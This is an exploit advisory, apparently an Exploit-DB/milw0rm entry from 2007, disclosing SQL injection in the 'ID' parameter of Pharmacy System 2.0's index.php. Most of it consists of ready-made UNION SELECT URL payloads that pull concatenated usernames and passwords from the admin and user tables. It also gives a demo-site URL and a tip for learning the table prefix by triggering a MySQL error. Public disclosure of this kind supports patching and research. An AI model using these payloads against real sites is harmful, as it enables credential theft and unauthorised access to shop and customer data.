Pharmacy System 2.0 - 'index.php?ID' SQL Injection

EDB-ID:

4095


Author:

t0pP8uZz

Type:

webapps


Platform:

PHP

Date:

2007-06-24


--==+================================================================================+==--
--==+             Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS           +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog


SCRIPT DOWNLOAD: PAY SCRIPT


SITE: http://www.netartmedia.net/pharmacysystem/


DORK: N/A


EXPLOITS:

EXPLOIT 1: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users
EXPLOIT 2: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_users

EXAMPLES:

EXAMPLE ON DEMO: http://www.wscreator.com/pharma1/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users

NOTE/TIP: Most sites will have diffrent table prefix, so table pharma1_admin_users probarly wont exist, to get the prefix
follow these steps, goto "http://server.com/index.php?page='" this should cause a mysql error and you will be able to
see the mysql query being used for the page variable. Simple replace the prefix from the error with then one in the injection
if you cant do that then dont use the exploit.

GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net


--==+================================================================================+==--
--==+            Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS            +==--
--==+================================================================================+==-- 

# milw0rm.com [2007-06-24]